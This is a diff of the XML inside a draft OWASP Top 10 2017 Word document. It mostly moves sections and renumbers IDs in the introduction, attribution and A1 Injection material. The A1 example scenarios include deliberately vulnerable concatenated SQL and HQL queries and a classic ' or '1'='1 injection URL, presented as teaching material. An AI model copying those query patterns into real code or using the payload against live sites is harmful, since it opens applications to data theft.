--- a/2017/OWASP-Top-10-2017-en.docx
+++ b/2017/OWASP-Top-10-2017-en.docx
@@ -4,19 +4,12 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="section"/>
-      <w:bookmarkEnd w:id="21"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
         <w:drawing>
           <wp:inline>
-            <wp:extent cx="5334000" cy="1891610"/>
+            <wp:extent cx="5943600" cy="1820742"/>
             <wp:effectExtent b="0" l="0" r="0" t="0"/>
             <wp:docPr descr="" id="1" name="Picture"/>
             <a:graphic>
@@ -29,7 +22,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -37,7 +30,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5334000" cy="1891610"/>
+                      <a:ext cx="5943600" cy="1820742"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -58,12 +51,30 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="owasp-top-10-2017-master-draft"/>
+      <w:bookmarkEnd w:id="22"/>
+      <w:r>
+        <w:t xml:space="preserve">OWASP Top 10 2017-master (DRAFT)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">September 2017</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="owasp-top-10-2017-master-draft"/>
+      <w:bookmarkStart w:id="23" w:name="foreword-by-owasp-top-10-project-leadership"/>
       <w:bookmarkEnd w:id="23"/>
       <w:r>
-        <w:t xml:space="preserve">OWASP Top 10 2017-master (DRAFT)</w:t>
+        <w:t xml:space="preserve">Foreword by OWASP Top 10 Project Leadership</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -71,17 +82,75 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">September 2017</w:t>
+        <w:t xml:space="preserve">TBA</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1001"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Torsten Gigler</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1001"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Brian Glas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1001"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Neil Smithline</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1001"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Andrew van der Stock</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="introduction"/>
+      <w:bookmarkEnd w:id="24"/>
+      <w:r>
+        <w:t xml:space="preserve">Introduction</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="foreword-by-owasp-top-10-project-leadership"/>
-      <w:bookmarkEnd w:id="24"/>
-      <w:r>
-        <w:t xml:space="preserve">Foreword by OWASP Top 10 Project Leadership</w:t>
+      <w:bookmarkStart w:id="25" w:name="welcome"/>
+      <w:bookmarkEnd w:id="25"/>
+      <w:r>
+        <w:t xml:space="preserve">Welcome</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -89,75 +158,33 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">TBA</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1001"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Torsten Gigler</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1001"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Brian Glas</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1001"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Neil Smithline</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1001"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Andrew van der Stock</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="introduction"/>
-      <w:bookmarkEnd w:id="25"/>
-      <w:r>
-        <w:t xml:space="preserve">Introduction</w:t>
+        <w:t xml:space="preserve">Welcome to the OWASP Top 10 2017! This major update adds two new vulnerability categories for the first time: (1) Insufficient Attack Detection and Prevention and (2) Underprotected APIs. We made room for these two new categories by merging the two access control categories (2013-A4 and 2013-A7) back into Broken Access Control (which is what they were called in the OWASP Top 10 - 2004), and dropping 2013-A10: Unvalidated Redirects and Forwards, which was added to the Top 10 in 2010.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The OWASP Top 10 for 2017 is based primarily on 11 large datasets from firms that specialize in application security, including 8 consulting companies and 3 product vendors. This data spans vulnerabilities gathered from hundreds of organizations and over 50,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="welcome"/>
+      <w:bookmarkStart w:id="26" w:name="warnings"/>
       <w:bookmarkEnd w:id="26"/>
       <w:r>
-        <w:t xml:space="preserve">Welcome</w:t>
+        <w:t xml:space="preserve">Warnings</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -165,7 +192,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Welcome to the OWASP Top 10 2017! This major update adds two new vulnerability categories for the first time: (1) Insufficient Attack Detection and Prevention and (2) Underprotected APIs. We made room for these two new categories by merging the two access control categories (2013-A4 and 2013-A7) back into Broken Access Control (which is what they were called in the OWASP Top 10 - 2004), and dropping 2013-A10: Unvalidated Redirects and Forwards, which was added to the Top 10 in 2010.</w:t>
+        <w:t xml:space="preserve">Don’t stop at 10. There are hundreds of issues that could affect the overall security of a web application as discussed in the OWASP Developer’s Guide and the OWASP Cheat Sheet Series. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the OWASP Testing Guide and the OWASP Code Review Guide.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -173,7 +200,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The OWASP Top 10 for 2017 is based primarily on 11 large datasets from firms that specialize in application security, including 8 consulting companies and 3 product vendors. This data spans vulnerabilities gathered from hundreds of organizations and over 50,000 real-world applications and APIs. The Top 10 items are selected and prioritized according to this prevalence data, in combination with consensus estimates of exploitability, detectability, and impact.</w:t>
+        <w:t xml:space="preserve">Constant change. This Top 10 will continue to change. Even without changing a single line of your application’s code, you may become vulnerable as new flaws are discovered and attack methods are refined. Please review the advice at the end of the Top 10 in “What’s Next For Developers, Verifiers, and Organizations” for more information.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -181,17 +208,33 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high risk problem areas – and also provides guidance on where to go from here.</w:t>
+        <w:t xml:space="preserve">Think positive. When you’re ready to stop chasing vulnerabilities and focus on establishing strong application security controls, OWASP is maintaining and promoting the Application Security Verification Standard (ASVS) as a guide to organizations and application reviewers on what to verify.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Use tools wisely. Security vulnerabilities can be quite complex and buried in mountains of code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Push left, right, and everywhere. Focus on making security an integral part of your culture throughout your development organization. Find out more in the OWASP Software Assurance Maturity Model (SAMM) and the Rugged Handbook.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="warnings"/>
+      <w:bookmarkStart w:id="27" w:name="attribution"/>
       <w:bookmarkEnd w:id="27"/>
       <w:r>
-        <w:t xml:space="preserve">Warnings</w:t>
+        <w:t xml:space="preserve">Attribution</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -199,7 +242,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Don’t stop at 10. There are hundreds of issues that could affect the overall security of a web application as discussed in the OWASP Developer’s Guide and the OWASP Cheat Sheet Series. These are essential reading for anyone developing web applications and APIs. Guidance on how to effectively find vulnerabilities in web applications and APIs is provided in the OWASP Testing Guide and the OWASP Code Review Guide.</w:t>
+        <w:t xml:space="preserve">Thanks to Aspect Security for initiating, leading, and updating the OWASP Top 10 since its inception in 2003, and to its primary authors: Jeff Williams and Dave Wichers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -207,7 +250,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Constant change. This Top 10 will continue to change. Even without changing a single line of your application’s code, you may become vulnerable as new flaws are discovered and attack methods are refined. Please review the advice at the end of the Top 10 in “What’s Next For Developers, Verifiers, and Organizations” for more information.</w:t>
+        <w:t xml:space="preserve">We’d like to thank the many organizations that contributed their vulnerability prevalence data to support the 2017 update, including these large data set providers:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -215,7 +258,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Think positive. When you’re ready to stop chasing vulnerabilities and focus on establishing strong application security controls, OWASP is maintaining and promoting the Application Security Verification Standard (ASVS) as a guide to organizations and application reviewers on what to verify.</w:t>
+        <w:t xml:space="preserve">Aspect Security, AsTech Consulting, Branding Brand, Contrast Security, EdgeScan, iBLISS, Minded Security, Paladion Networks, Softtek, Vantage Point, Veracode</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -223,7 +266,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Use tools wisely. Security vulnerabilities can be quite complex and buried in mountains of code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.</w:t>
+        <w:t xml:space="preserve">For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is publicly available.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -231,97 +274,47 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Push left, right, and everywhere. Focus on making security an integral part of your culture throughout your development organization. Find out more in the OWASP Software Assurance Maturity Model (SAMM) and the Rugged Handbook.</w:t>
+        <w:t xml:space="preserve">We would like to thank in advance those who contribute significant constructive comments and time reviewing this update to the Top 10 and to:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1002"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Neil Smithline – Generating the Wiki version</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:numId w:val="1002"/>
+          <w:ilvl w:val="0"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Torsten Gigler - German translation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">And finally, we’d like to thank in advance all the translators out there that will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="attribution"/>
+      <w:bookmarkStart w:id="28" w:name="copyright-and-license"/>
       <w:bookmarkEnd w:id="28"/>
-      <w:r>
-        <w:t xml:space="preserve">Attribution</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Thanks to Aspect Security for initiating, leading, and updating the OWASP Top 10 since its inception in 2003, and to its primary authors: Jeff Williams and Dave Wichers.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">We’d like to thank the many organizations that contributed their vulnerability prevalence data to support the 2017 update, including these large data set providers:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Aspect Security, AsTech Consulting, Branding Brand, Contrast Security, EdgeScan, iBLISS, Minded Security, Paladion Networks, Softtek, Vantage Point, Veracode</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">For the first time, all the data contributed to a Top 10 release, and the full list of contributors, is publicly available.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">We would like to thank in advance those who contribute significant constructive comments and time reviewing this update to the Top 10 and to:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1002"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Neil Smithline – Generating the Wiki version</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:numId w:val="1002"/>
-          <w:ilvl w:val="0"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Torsten Gigler - German translation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">And finally, we’d like to thank in advance all the translators out there that will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="copyright-and-license"/>
-      <w:bookmarkEnd w:id="29"/>
       <w:r>
         <w:t xml:space="preserve">Copyright and License</w:t>
       </w:r>
@@ -346,7 +339,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30"/>
+                    <a:blip r:embed="rId29"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -599,8 +592,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="31" w:name="about-owasp"/>
-      <w:bookmarkEnd w:id="31"/>
+      <w:bookmarkStart w:id="30" w:name="about-owasp"/>
+      <w:bookmarkEnd w:id="30"/>
       <w:r>
         <w:t xml:space="preserve">About OWASP</w:t>
       </w:r>
@@ -707,7 +700,7 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId32">
+      <w:hyperlink r:id="rId31">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -752,8 +745,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="a1-injections"/>
-      <w:bookmarkEnd w:id="33"/>
+      <w:bookmarkStart w:id="32" w:name="a1-injections"/>
+      <w:bookmarkEnd w:id="32"/>
       <w:r>
         <w:t xml:space="preserve">A1 Injections</w:t>
       </w:r>
@@ -1013,10 +1006,44 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="34" w:name="am-i-vulnerable-to-attack"/>
+      <w:bookmarkStart w:id="33" w:name="am-i-vulnerable-to-attack"/>
+      <w:bookmarkEnd w:id="33"/>
+      <w:r>
+        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query. In many cases, it is recommended to avoid the interpreter, or disable it (e.g., XXE), if possible. For SQL calls, use bind variables in all prepared statements and stored procedures, or avoid dynamic queries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find use of interpreters and trace data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="34" w:name="how-do-i-prevent"/>
       <w:bookmarkEnd w:id="34"/>
       <w:r>
-        <w:t xml:space="preserve">Am I vulnerable to attack?</w:t>
+        <w:t xml:space="preserve">How do I prevent</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1024,7 +1051,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query. In many cases, it is recommended to avoid the interpreter, or disable it (e.g., XXE), if possible. For SQL calls, use bind variables in all prepared statements and stored procedures, or avoid dynamic queries.</w:t>
+        <w:t xml:space="preserve">Preventing injection requires keeping untrusted data separate from commands and queries.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1032,7 +1059,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find use of interpreters and trace data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.</w:t>
+        <w:t xml:space="preserve">The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1040,17 +1067,23 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.</w:t>
+        <w:t xml:space="preserve">If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. OWASP’s Java Encoder and similar libraries provide such escaping routines.</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="textWrapping"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Positive or “white list” input validation is also recommended, but is not a complete defense as many situations require special characters be allowed. If special characters are required, only approaches (1) and (2) above will make their use safe. OWASP’s ESAPI has an extensible library of white list input validation routines.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="35" w:name="how-do-i-prevent"/>
+      <w:bookmarkStart w:id="35" w:name="example-scenarios"/>
       <w:bookmarkEnd w:id="35"/>
       <w:r>
-        <w:t xml:space="preserve">How do I prevent</w:t>
+        <w:t xml:space="preserve">Example Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1058,7 +1091,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Preventing injection requires keeping untrusted data separate from commands and queries.</w:t>
+        <w:t xml:space="preserve">Scenario #1: An application uses untrusted data in the construction of the following vulnerable SQL call:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1066,7 +1099,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.</w:t>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1074,31 +1110,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. OWASP’s Java Encoder and similar libraries provide such escaping routines.</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Positive or “white list” input validation is also recommended, but is not a complete defense as many situations require special characters be allowed. If special characters are required, only approaches (1) and (2) above will make their use safe. OWASP’s ESAPI has an extensible library of white list input validation routines.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="36" w:name="example-scenarios"/>
-      <w:bookmarkEnd w:id="36"/>
-      <w:r>
-        <w:t xml:space="preserve">Example Scenarios</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Scenario #1: An application uses untrusted data in the construction of the following vulnerable SQL call:</w:t>
+        <w:t xml:space="preserve">Scenario #2: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g., Hibernate Query Language (HQL)):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1106,41 +1118,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Scenario #2: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g., Hibernate Query Language (HQL)):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyText"/>
-      </w:pPr>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Query HQLQuery = session.createQuery("FROM accounts</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">WHERE custID='" + request.getParameter("id") + "'");</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Query HQLQuery = session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1168,21 +1149,10 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:br w:type="textWrapping"/>
-      </w:r>
-      <w:hyperlink r:id="rId37">
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve">http://example.com/app/accountView?id</w:t>
-        </w:r>
-      </w:hyperlink>
-      <w:r>
-        <w:t xml:space="preserve">=' or '1'='1</w:t>
-      </w:r>
-      <w:r>
-        <w:br w:type="textWrapping"/>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">http://example.com/app/accountView?id=' or '1'='1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1197,8 +1167,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="38" w:name="references"/>
-      <w:bookmarkEnd w:id="38"/>
+      <w:bookmarkStart w:id="36" w:name="references"/>
+      <w:bookmarkEnd w:id="36"/>
       <w:r>
         <w:t xml:space="preserve">References</w:t>
       </w:r>
@@ -1207,8 +1177,8 @@
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
       </w:pPr>
-      <w:bookmarkStart w:id="39" w:name="owasp"/>
-      <w:bookmarkEnd w:id="39"/>
+      <w:bookmarkStart w:id="37" w:name="owasp"/>
+      <w:bookmarkEnd w:id="37"/>
       <w:r>
         <w:t xml:space="preserve">OWASP</w:t>
       </w:r>
@@ -1221,7 +1191,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1238,7 +1208,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1255,7 +1225,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -1272,7 +1242,7 @@
           <w:ilvl w:val="0"/>
         </w:numPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40">
+      <w:hyperlink r:id="rId38">
         <w:r>
           <w:rPr>
